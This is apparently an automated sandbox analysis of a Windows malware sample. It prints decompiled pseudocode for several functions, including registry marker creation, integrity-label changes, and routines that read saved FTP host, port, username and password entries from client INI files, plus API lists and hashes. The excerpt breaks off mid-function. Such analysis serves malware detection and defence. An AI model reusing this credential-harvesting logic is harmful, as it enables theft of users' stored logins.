Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: $V@$.exe
API String ID: 2200435814-3083688719
Opcode ID: 4accd94452d3018da89520b07c073e182a16a5e552fd26116ef8d2dc49ab9606
Instruction ID: 969ff949d3c7489b746113f194177ab54c20ab506cd10e8ead494315615ad2cd
Opcode Fuzzy Hash: 4accd94452d3018da89520b07c073e182a16a5e552fd26116ef8d2dc49ab9606
Instruction Fuzzy Hash: CD11C272B00114ABDB10AB7ADD49ADF3BACDF84310F004527B945F71A1DA78EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004154C9, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004154C9(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0041532E(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x004154ee
0x004154f1
0x004154f3
0x004154f5
0x004154fe
0x00415501
0x0041550a
0x00415527
0x00000000
0x00415529
0x0041552c
0x00415532
0x0041553f
0x00000000
0x00000000
0x00000000
0x00415532
0x00415543
0x00415546
0x00000000
0x00415534
0x00415534
0x00415537
0x00000000
0x0041553d
0x00415549
0x0041554f

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 004154F1

Part of subcall function 0041532E: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00415523
RegCloseKey.ADVAPI32(?), ref: 0041552C
RegCloseKey.ADVAPI32(?), ref: 00415546

Strings

d, xrefs: 00415537
SOFTWARE\Microsoft, xrefs: 004154E4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 7c20a1f07a562ed7e99db95cb8be85ec54330ea9dc4aa21ad0ffef6db9f65af7
Instruction ID: f7d9bcdce10a0a4694893e4f5c9c80533c0b3d72a2a8b13692c4d9cc270dbf04
Opcode Fuzzy Hash: 7c20a1f07a562ed7e99db95cb8be85ec54330ea9dc4aa21ad0ffef6db9f65af7
Instruction Fuzzy Hash: C3118BB580020CFEEB019B949D81EFFBB7EEB44388F104062F901B6160D2758E858BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00414661, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00414661(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E004127D2(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0041466d
0x0041466f
0x00414675
0x00414680
0x00414688
0x00414699
0x0041469c
0x004146a4
0x004146b3
0x004146bb
0x004146bd
0x004146bd
0x004146bb
0x004146c2
0x004146c2
0x004146cc

APIs

Part of subcall function 004127D2: GetCurrentThread.KERNEL32 ref: 004127E2
Part of subcall function 004127D2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
Part of subcall function 004127D2: OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00414680
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 0041469C
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 004146B3
LocalFree.KERNEL32(?), ref: 004146C2

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0041467B
SeSecurityPrivilege, xrefs: 00414668

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: d568c0cd6f0dbe94d79818d916dbfd3a375d4577492f1a4505ff72b2e796563f
Instruction ID: 2e5adc258d90809973483a961aaef7466a96ef4a73684203de974bfab2ef8f1d
Opcode Fuzzy Hash: d568c0cd6f0dbe94d79818d916dbfd3a375d4577492f1a4505ff72b2e796563f
Instruction Fuzzy Hash: FA0131B564020CBFEB11AFA08D85EEF7B7DEB05744F000466B601F11A1E67A9E949A28

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA7B, Relevance: 9.2, APIs: 6, Instructions: 215
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA7B(void* __edx, void* __eflags, intOrPtr* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v8;
				long _v12;
				char* _v16;
				struct _GOPHER_FIND_DATAA _v20;
				struct _GOPHER_FIND_DATAA _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v37;
				char _v40;
				intOrPtr _v48;
				char _v49;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				struct _GOPHER_FIND_DATAA _t72;
				intOrPtr _t73;
				struct _GOPHER_FIND_DATAA _t74;
				struct _GOPHER_FIND_DATAA _t75;
				struct _GOPHER_FIND_DATAA _t83;
				signed int _t87;
				struct _GOPHER_FIND_DATAA _t95;
				struct _GOPHER_FIND_DATAA _t100;
				int _t105;
				struct _GOPHER_FIND_DATAA _t107;
				struct _GOPHER_FIND_DATAA _t110;
				struct _GOPHER_FIND_DATAA _t114;
				intOrPtr* _t119;
				void* _t124;
				intOrPtr _t125;
				void* _t129;
				struct _GOPHER_FIND_DATAA _t134;
				struct _GOPHER_FIND_DATAA _t137;
				struct _GOPHER_FIND_DATAA _t138;
				struct _GOPHER_FIND_DATAA _t142;
				struct _GOPHER_FIND_DATAA _t148;

				_t129 = __edx;
				_v32 = _v32 | 0xffffffff;
				EnterCriticalSection(0x41ec60);
				_t119 = _a4;
				_t69 = E0040F357( *_t119);
				if(_t69 == 0xffffffff) {
					L45:
					LeaveCriticalSection(0x41ec60);
					return _v32;
				}
				_t125 =  *0x41ec78; // 0x0
				_t142 = _t69 * 0x24 + _t125;
				if( *((intOrPtr*)(_t142 + 0x10)) <= 0) {
					goto L45;
				}
				_v24 = _t142;
				if( *((intOrPtr*)(_t142 + 0x10)) != 1 || ( *( *(_t142 + 0xc)) & 0x00000003) == 0) {
					_t72 = _a16;
					__eflags = _t72;
					if(_t72 != 0) {
						 *_t72 =  *_t72 & 0x00000000;
						__eflags =  *_t72;
					}
					__eflags =  *((intOrPtr*)(_t142 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L35:
						_t73 =  *((intOrPtr*)(_t142 + 0x18));
						__eflags = _t73 - 0xffffffff;
						if(_t73 != 0xffffffff) {
							__eflags = _v32 - 0xffffffff;
							if(_v32 == 0xffffffff) {
								_t74 = _t73 -  *(_t142 + 0x1c);
								__eflags = _t74;
								_t134 = _t74;
								if(_t74 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0041248B(0x2000, 0x1000);
									}
									__eflags = _a12 - _t134;
									_t134 =  <  ? _a12 : _t134;
									__eflags = _a8;
									if(_a8 != 0) {
										E00411142(_a8,  *((intOrPtr*)(_t142 + 0x14)) +  *(_t142 + 0x1c), _t134);
										_t64 = _t142 + 0x1c;
										 *_t64 =  *(_t142 + 0x1c) + _t134;
										__eflags =  *_t64;
									}
								}
								_t75 = _a16;
								__eflags = _t75;
								if(_t75 != 0) {
									 *_t75 = _t134;
								}
								_v32 = 1;
							}
						}
						goto L45;
					}
					LeaveCriticalSection(0x41ec60);
					_v49 = E0040F97B( &_v28, __eflags,  *_t119,  *((intOrPtr*)(_t142 + 4)),  &_v36);
					EnterCriticalSection(0x41ec60);
					_t83 = E004091CB();
					_t136 = _t83;
					_t145 = E00413240( &_v32,  *_t119);
					_v36 = E00411346(_v36, 0, _t84);
					__eflags = _t83;
					if(__eflags == 0) {
						L20:
						__eflags = _v37;
						if(_v37 == 0) {
							L33:
							_t50 =  &_v32;
							 *_t50 = _v32 & 0x00000000;
							__eflags =  *_t50;
							SetLastError(0x2ee4);
							L34:
							_t142 = _v24;
							goto L35;
						}
						_t121 =  *_t119;
						_t87 = E0040F357( *_t119);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							E00411106(_v36);
							goto L33;
						}
						_t137 = _t87 * 0x24 +  *0x41ec78;
						_v24 = _t137;
						_t122 = E00413240( &_v8, _t121);
						_t95 = E00408A1C( *((intOrPtr*)(_t137 + 0x10)),  *((intOrPtr*)(_t137 + 0xc)), _t91,  &_v40,  &_v32);
						__eflags = _t95;
						if(_t95 != 0) {
							_t100 = E00411346(_v8, 0, _t122);
							_v24 = _t100;
							__eflags = _t100;
							if(_t100 != 0) {
								_v12 = 0x1000;
								_t148 = E004110D6(0x1000);
								__eflags = _t148;
								if(_t148 != 0) {
									 *_t148 = 0x50;
									_t105 = GetUrlCacheEntryInfoW(_v16, _t148,  &_v12);
									__eflags = _t105;
									if(_t105 != 0) {
										_t107 =  *(_t148 + 8);
										__eflags = _t107;
										if(_t107 != 0) {
											__eflags =  *_t107;
											if( *_t107 != 0) {
												E00416070(_t107, _v48, _v40);
											}
										}
									}
									E00411106(_t148);
								}
								E00411106(_v16);
							}
						}
						E00411106(_t122);
						 *((intOrPtr*)(_t137 + 0x14)) = _v40;
						 *(_t137 + 0x18) = _v32;
						goto L34;
					}
					_t138 = E00416A93( &_v16, _t129, __eflags, _t136, 0x4e25, 0x10000000);
					_v20 = _t138;
					_t110 = E00411F98(_t109, _v28);
					__eflags = _t110;
					if(_t110 == 0) {
						L19:
						E00411106(_v8);
						_t119 = _a4;
						goto L20;
					} else {
						goto L10;
					}
					do {
						L10:
						__eflags =  *(_t138 + 1);
						if( *(_t138 + 1) == 0) {
							goto L18;
						}
						__eflags =  *_t138 - 0x2b;
						if( *_t138 == 0x2b) {
							_t124 = 4;
							_t138 = _t138 + 1;
							__eflags = _t138;
						} else {
							_t124 = 0;
						}
						_t128 = _t138;
						_t114 = E00407B90(_t138, 0, _t145, _v20);
						__eflags = _t114;
						if(_t114 != 0) {
							__eflags = _t124 - 4;
							if(_t124 == 4) {
								E0040845B(_t128, 0, _v12, 0, 1);
							}
							__eflags = _t124 - 2;
							if(_t124 != 2) {
								goto L19;
							}
						}
						L18:
						_t138 = E00411FD6(_t138, 1);
						__eflags = _t138;
					} while (_t138 != 0);
					goto L19;
				} else {
					 *_t119 =  *((intOrPtr*)(_t142 + 0x20));
					goto L45;
				}
			}

0x0040fa7b
0x0040fa84
0x0040fa92
0x0040fa98
0x0040fa9d
0x0040faa5
0x0040fd10
0x0040fd15
0x0040fd25
0x0040fd25
0x0040faab
0x0040fab4
0x0040fabb
0x00000000
0x00000000
0x0040fac5
0x0040fac9
0x0040fadd
0x0040fae0
0x0040fae2
0x0040fae4
0x0040fae4
0x0040fae4
0x0040fae7
0x0040faeb
0x0040fcb1
0x0040fcb1
0x0040fcb4
0x0040fcb7
0x0040fcb9
0x0040fcbe
0x0040fcc0
0x0040fcc0
0x0040fcc3
0x0040fcc5
0x0040fcc7
0x0040fccb
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce2
0x0040fce6
0x0040fcea
0x0040fcf7
0x0040fcfc
0x0040fcfc
0x0040fcfc
0x0040fcfc
0x0040fcea
0x0040fcff
0x0040fd02
0x0040fd04
0x0040fd06
0x0040fd06
0x0040fd08
0x0040fd08
0x0040fcbe
0x00000000
0x0040fcb7
0x0040faf5
0x0040fb11
0x0040fb15
0x0040fb1b
0x0040fb26
0x0040fb2d
0x0040fb3b
0x0040fb3f
0x0040fb41
0x0040fbc0
0x0040fbc0
0x0040fbc5
0x0040fc9d
0x0040fc9d
0x0040fc9d
0x0040fc9d
0x0040fca7
0x0040fcad
0x0040fcad
0x00000000
0x0040fcad
0x0040fbcb
0x0040fbcf
0x0040fbd4
0x0040fbd7
0x0040fc98
0x00000000
0x0040fc98
0x0040fbe7
0x0040fbed
0x0040fbf9
0x0040fc09
0x0040fc0e
0x0040fc10
0x0040fc19
0x0040fc1e
0x0040fc22
0x0040fc24
0x0040fc2b
0x0040fc34
0x0040fc36
0x0040fc38
0x0040fc44
0x0040fc4a
0x0040fc50
0x0040fc52
0x0040fc54
0x0040fc57
0x0040fc59
0x0040fc5b
0x0040fc5f
0x0040fc6a
0x0040fc6a
0x0040fc5f
0x0040fc59
0x0040fc70
0x0040fc70
0x0040fc79
0x0040fc79
0x0040fc24
0x0040fc7f
0x0040fc88
0x0040fc8f
0x00000000
0x0040fc8f
0x0040fb5b
0x0040fb5d
0x0040fb61
0x0040fb66
0x0040fb68
0x0040fbb4
0x0040fbb8
0x0040fbbd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fb6a
0x0040fb6a
0x0040fb6a
0x0040fb6e
0x00000000
0x00000000
0x0040fb70
0x0040fb73
0x0040fb79
0x0040fb7b
0x0040fb7b
0x0040fb75
0x0040fb75
0x0040fb75
0x0040fb83
0x0040fb85
0x0040fb8a
0x0040fb8c
0x0040fb8e
0x0040fb91
0x0040fb9b
0x0040fb9b
0x0040fba0
0x0040fba3
0x00000000
0x00000000
0x0040fba3
0x0040fba5
0x0040fbae
0x0040fbb0
0x0040fbb0
0x00000000
0x0040fad3
0x0040fad6
0x00000000
0x0040fad6

APIs

EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FA92
LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040FAF5
EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FB15
GetUrlCacheEntryInfoW.WININET(?,00000000,?), ref: 0040FC4A
LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040FD15

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryInfo
String ID:
API String ID: 4230765043-0
Opcode ID: b36fcae4a890c18a0c8cb39e2618034a1804c4b62b4248cf0081630c90613d0d
Instruction ID: b1620a93fae71bc2132c2368271f7604e76644449d7e1ec5af53f54e0245313c
Opcode Fuzzy Hash: b36fcae4a890c18a0c8cb39e2618034a1804c4b62b4248cf0081630c90613d0d
Instruction Fuzzy Hash: AD818B31504305ABDB20DF25C885B5BB7E4BF88314F040A3EF995A76E1D738E989CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFE4, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040AFE4(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E004110D6(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E00411106(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00411FB6(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E004110D6(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E0040CA33(_t61,  &_v584);
						_t63 = 0x73;
						E0040CA33(_t63,  &_v596);
						_t65 = 0x74;
						E0040CA33(_t65,  &_v608);
						_t67 = 0x75;
						E0040CA33(_t67,  &_v624);
						_t69 = 0x76;
						E0040CA33(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E00411FF2(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00411C55(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E0040CA33(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E00411DF9(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E004114FA(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E00411106(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E0040AFAC(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x0040afea
0x0040b008
0x0040b1fe
0x0040b206
0x0040b206
0x0040b00e
0x0040b011
0x0040b032
0x0040b036
0x0040b03a
0x0040b03c
0x00000000
0x00000000
0x0040b059
0x0040b05b
0x0040b05d
0x0040b1f8
0x0040b1f9
0x00000000
0x0040b1f9
0x0040b063
0x0040b068
0x0040b06d
0x0040b06f
0x00000000
0x00000000
0x0040b07f
0x0040b081
0x0040b085
0x0040b087
0x0040b08d
0x0040b095
0x0040b099
0x0040b0a1
0x0040b0a2
0x0040b0ad
0x0040b0ae
0x0040b0b9
0x0040b0ba
0x0040b0c5
0x0040b0c6
0x0040b0d1
0x0040b0d2
0x0040b0d7
0x0040b1d4
0x0040b1da
0x0040b1df
0x0040b1e3
0x0040b1e5
0x0040b0d9
0x0040b0dd
0x0040b0e6
0x0040b0ec
0x0040b0ee
0x0040b10e
0x0040b110
0x0040b112
0x0040b12b
0x0040b131
0x0040b136
0x0040b13b
0x0040b14a
0x0040b15c
0x0040b15e
0x0040b160
0x0040b16b
0x0040b16b
0x0040b17d
0x0040b17f
0x0040b181
0x0040b185
0x0040b18a
0x0040b18c
0x0040b190
0x0040b194
0x0040b195
0x0040b19a
0x0040b19e
0x0040b1a4
0x0040b1ae
0x0040b1af
0x0040b1b6
0x0040b1bb
0x0040b1be
0x0040b1c0
0x0040b1c2
0x0040b1c8
0x0040b1cd
0x0040b1cf
0x0040b1d1
0x0040b1d1
0x0040b1d1
0x0040b1d1
0x0040b1cf
0x0040b1c0
0x0040b18c
0x0040b181
0x0040b160
0x0040b13b
0x0040b112
0x00000000
0x0040b0ee
0x0040b1ef
0x0040b1f4
0x0040b1f4
0x00000000
0x0040b013
0x0040b01e
0x00000000
0x0040b01e

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

GetPrivateProfileStringW.KERNEL32 ref: 0040B059
StrStrIW.SHLWAPI(?,?), ref: 0040B0E6
GetPrivateProfileStringW.KERNEL32 ref: 0040B10E
GetPrivateProfileIntW.KERNEL32 ref: 0040B12B
GetPrivateProfileStringW.KERNEL32 ref: 0040B15C

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 937cabdef85e42db54521cd274822ade0ddd2daa839fa3ae1e9f4bc51b6c9373
Instruction ID: 4c995a1cef47ed7fb47bc366f3fbe69fa515b374cdee71186195bbf4546755d2
Opcode Fuzzy Hash: 937cabdef85e42db54521cd274822ade0ddd2daa839fa3ae1e9f4bc51b6c9373
Instruction Fuzzy Hash: 81518232504306ABDB10DB55CC51EEBB7E8EF88744F00093AB994E72A1DB38D945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABED, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040ABED(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E004110D6(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E00411106(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00411FB6(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E004110D6(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E0040CA33(_t48,  &_v112);
					_t50 = 0x66;
					E0040CA33(_t50,  &_v48);
					_t52 = 0x67;
					E0040CA33(_t52,  &_v32);
					_t54 = 0x68;
					E0040CA33(_t54,  &_v88);
					_t56 = 0x69;
					E0040CA33(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E00411FF2(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040AA82(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E0040CA33(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E00411DF9(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E004114FA(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E00411106(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x0040abed
0x0040abfe
0x0040ac03
0x0040ac07
0x0040ac0c
0x0040ad8d
0x0040ad8d
0x0040ac24
0x0040ac28
0x0040ad83
0x00000000
0x0040ad84
0x0040ac2e
0x0040ac3a
0x00000000
0x00000000
0x0040ac4a
0x0040ac4c
0x0040ac51
0x00000000
0x0040ac57
0x0040ac57
0x0040ac5f
0x0040ac62
0x0040ac68
0x0040ac69
0x0040ac73
0x0040ac74
0x0040ac7e
0x0040ac7f
0x0040ac89
0x0040ac8a
0x0040ac94
0x0040ac95
0x0040ac9a
0x0040ad63
0x0040ad68
0x0040ad6d
0x0040ad72
0x0040ac9c
0x0040ac9f
0x0040acb0
0x0040acbd
0x0040acc1
0x0040ace6
0x0040acfb
0x0040ad04
0x0040ad04
0x0040ad15
0x0040ad23
0x0040ad29
0x0040ad2a
0x0040ad2f
0x0040ad32
0x0040ad39
0x0040ad3a
0x0040ad40
0x0040ad45
0x0040ad4a
0x0040ad4f
0x0040ad51
0x0040ad5e
0x0040ad60
0x0040ad60
0x0040ad5e
0x0040ad4f
0x0040ad15
0x0040acfb
0x0040acc1
0x00000000
0x0040ad78
0x0040ad7b
0x0040ad80
0x00000000
0x0040ad80
0x0040ad72

APIs

GetPrivateProfileStringW.KERNEL32 ref: 0040AC24

Part of subcall function 004110D6: HeapAlloc.KERNEL32(00000008,-00000004,004128A4,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004110E7

StrStrIW.SHLWAPI(?,?), ref: 0040ACAC
StrStrIW.SHLWAPI(?,?), ref: 0040ACBD
GetPrivateProfileStringW.KERNEL32 ref: 0040ACD9
GetPrivateProfileStringW.KERNEL32 ref: 0040ACF7
GetPrivateProfileStringW.KERNEL32 ref: 0040AD11

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 2723e1f6f8c43eafb8186d9b65ddac2be5b64aff75321912f9b90b9aece90382
Instruction ID: b802708dbaa5b71d6d8ecd423b6b0798cdfa7e3fe1f80c9dfbcd1a67840d2701
Opcode Fuzzy Hash: 2723e1f6f8c43eafb8186d9b65ddac2be5b64aff75321912f9b90b9aece90382
Instruction Fuzzy Hash: 7F417E32D0021AFBDF10EBA5CC41AEEBB7AAF44754F144026B904B72A1D7399E168B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040570F, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040570F(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E00406D1E(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E00406D1E(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x41e590 =  *0x41e590 | 0x00000002;
				_push(0);
				E00404C55();
				E00405D8B(_t46, _t65);
				E0041652E( &_v1680, _t65);
				E0041652E(_t51, _t65);
				_t52 =  &_v2720;
